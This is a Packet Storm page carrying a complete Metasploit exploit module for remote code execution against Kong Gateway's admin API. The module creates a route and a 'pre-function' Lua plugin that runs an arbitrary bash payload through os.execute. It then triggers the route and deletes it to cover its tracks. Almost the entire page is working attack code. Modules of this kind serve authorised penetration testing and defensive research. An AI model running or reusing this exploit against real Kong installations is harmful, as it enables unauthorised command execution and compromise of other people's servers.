what you don't know can hurt you

Kong Gateway Admin API Remote Code Execution

Kong Gateway Admin API Remote Code Execution
Posted Nov 25, 2020
Authored by Graeme Robinson | Site metasploit.com

This Metasploit module uses the Kong admin API to create a route and a serverless function plugin that is associated with the route. The plugin runs Lua code and is used to run a system command using os.execute(). After execution the route is deleted, which also deletes the plugin.

tags | exploit
MD5 | 864501ece471d75b51c2e231c10cf5c4

Kong Gateway Admin API Remote Code Execution

Change Mirror Download
# frozen_string_literal: true

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(
info,
'Name' => 'Kong Gateway Admin API Remote Code Execution',
'Description' => '
This module uses the Kong admin API to create a route and a serverless function plugin that is associated with
the route. The plugin runs Lua code and is used to run a system command using os.execute(). After execution the
route is deleted, which also deletes the plugin.',
'License' => MSF_LICENSE,
'Author' => ['Graeme Robinson'],
'References' =>
[
['URL', 'https://konghq.com/'],
['URL', 'https://github.com/Kong/kong'],
['URL', 'https://docs.konghq.com/hub/kong-inc/serverless-functions/']
],
'Platform' => %w[linux macos],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[[
'Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory
]],
'Privileged' => false,
'DisclosureDate' => 'Oct 13 2020',
'DefaultOptions' => { 'RPORT' => 8001 },
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
}
))
register_options(
[
OptString.new('PUBLIC-API-RHOST', [false, 'The host where the public API is available, if different to RHOST']),
OptInt.new('PUBLIC-API-RPORT', [true, 'The port where the public API is available', 8000]),
OptString.new('TARGETURI', [true, 'URI to the Kong server', '/'])
],
self.class
)
end

def check_response(response, expected, path, description)
fail_with(Failure::Unreachable, "No response received from #{path} when #{description}") unless response
return if response.code == expected

fail_with(Failure::UnexpectedReply,
"Unexpected response from #{path} when #{description} (received #{response.code}, expected #{expected})")
end

def create_route
path = normalize_uri(target_uri.path, 'routes')
response = send_request_cgi({ 'method' => 'POST', 'uri' => path,
'vars_post' => { 'name' => @rand_name, 'paths' => '/' + @rand_name } })
check_response(response, 201, path, 'creating route')
end

def create_plugin
# The double square brackets helps to ensure single/double quotes in cmd payload do not interfere with syntax of
# os.execute Lua function. The ampersand backgrounds the command so that it doesn't cause Kong to hang.
cmd = %{os.execute([[bash -c "#{payload.encoded}" &]])}
path = normalize_uri(target_uri.path, 'routes', @rand_name, 'plugins')
response = send_request_cgi({ 'method' => 'POST', 'uri' => path,
'vars_post' => { 'name' => 'pre-function', 'config.access' => cmd } })
check_response(response, 201, path, 'creating plugin')
end

def request_route
path = normalize_uri(target_uri.path, @rand_name)
rhost = datastore['PUBLIC-API-RHOST'] if datastore['PUBLIC-API-RHOST']
rport = datastore['PUBLIC-API-RPORT'] if datastore['PUBLIC-API-RPORT']
retry_count = 0
begin
response = send_request_cgi({ 'uri' => path, 'rhost' => rhost, 'rport' => rport })
check_response(response, 503, path, 'requesting route')
rescue Msf::Exploit::Failed
maximum_retries = 3
if retry_count <= maximum_retries
retry_count += 1
print_status("Route not yet available, trying again - attempt #{retry_count}/#{maximum_retries}")
sleep(retry_count**2)
retry
end
raise
end
end

def delete_route
path = normalize_uri(target_uri.path, 'routes', @rand_name)

# Delete it
response = send_request_cgi({ 'method' => 'DELETE', 'uri' => path })
check_response(response, 204, path, 'deleting route')

# Check Whether it deleted
response = send_request_cgi({ 'uri' => path })
check_response(response, 404, path, 'verifying that route has been deleted')
end

def check
@route_cleanup_required = false
# Check admin API
response = send_request_cgi
return CheckCode::Unknown unless response
return CheckCode::Safe unless response.get_json_document['tagline'] == 'Welcome to kong'

# Check public API
rhost = datastore['PUBLIC-API-RHOST'] if datastore['PUBLIC-API-RHOST']
rport = datastore['PUBLIC-API-RPORT'] if datastore['PUBLIC-API-RPORT']
path = normalize_uri(target_uri.path, @rand_name)
response = send_request_cgi({ 'rport' => rport, 'rhost' => rhost, 'uri' => path })
return CheckCode::Unknown unless response
return CheckCode::Safe unless response.get_json_document['message'] == 'no Route matched with those values'

CheckCode::Appears
end

def exploit
@rand_name = rand_text_alphanumeric(10)
@route_cleanup_required = false
fail_with(Failure::UnexpectedReply, 'Admin API not detected') unless check == CheckCode::Appears
@route_cleanup_required = true
create_route
vprint_good("Created route #{@rand_name}")
create_plugin
vprint_good("Created plugin for route #{@rand_name}")
request_route
vprint_good("Requested route #{@rand_name} using public API")
end

def cleanup
return unless @route_cleanup_required

delete_route
vprint_good("Deleted route #{@rand_name}")
end
end
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    0 Files
  • 17
    Jan 17th
    0 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close